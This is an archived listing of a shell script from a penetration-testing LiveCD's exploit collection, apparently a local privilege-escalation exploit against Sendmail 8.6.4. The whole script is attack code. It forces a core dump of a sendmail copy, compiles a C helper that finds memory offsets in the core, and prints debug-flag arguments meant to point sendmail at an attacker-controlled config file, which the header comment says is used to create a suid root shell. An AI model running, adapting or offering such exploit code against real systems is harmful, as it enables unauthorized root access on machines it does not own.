home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
mail
/
sendmail
/
setid1.sh
< prev
next >
Wrap
Text File
|
2005-02-12
|
2KB
|
105 lines
# Modified to create a suid root shell in /tmp
# this has been tested on Sendmamil 8.6.4 but
# is assumed to work on other versions.
# calculate the parameters needed for a given sendmail
# program to change config file from "/etc/sendmail.cf"
# to "/tmp/sendmail.cf"
# location of a readable sendmail program
SENDMAIL=/usr/lib/sendmail
TEMP=/tmp/.ab$$
mkdir $TEMP
cp $SENDMAIL $TEMP/sm
cd $TEMP
chmod 700 ./sm
cat > calc.c << _EOF_
#include <fcntl.h>
gencore()
{
int pid;
int fd[2];
if(pipe(fd) < 0) {
perror("pipe");
exit(1);
return(0);
}
pid = fork();
if(!pid) {
int f = open("./out", O_RDWR|O_CREAT, 0666);
dup2(f, 1); dup2(fd[0], 0);
close(f); close(fd[1]); close(fd[0]);
execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);
perror("exec");
exit(0);
} else {
sleep(2);
kill(pid, 11);
}
close(fd[0]);
close(fd[1]);
}
main(argc,argv)
char **argv;
int argc;
{
unsigned int ConfFile,tTdvect,off;
gencore();
tTdvect = find("ZZZZZZZZ", "core");
ConfFile = find("/nau/local/lib/mail/aliases", "core");
if(!tTdvect || !ConfFile) {
printf("Not found!\n");
return(0);
}
off = ConfFile - tTdvect;
printf("sendmail -d%u.%d,%u.%d,%u.%d\n",
off+1, 't', off+2, 'm', off+3, 'p');
}
int find(pattern, file)
char *pattern,*file;
{
int fd;
int i, addr;
char c;
/* printf("find %s: ", pattern); */
fd = open(file, 0);
/* assume file exists
if(fd < 0) {
printf("file %s not found\n", file);
return(0);
}
*/
i = 0;
addr = 0;
while(read(fd, &c, 1) == 1) {
if(pattern[i] == c)
i++;
else
i=0;
if(pattern[i] == '\0') {
addr -= strlen(pattern);
printf("%x (%d)\n", addr, addr);
return(addr);
}
addr++;
}
printf("Not Found!\n");
return(0);
}
_EOF_
cc calc.c -o calc
./calc
cd
rm -rf $TEMP
# www.hack.co.za [2000]#
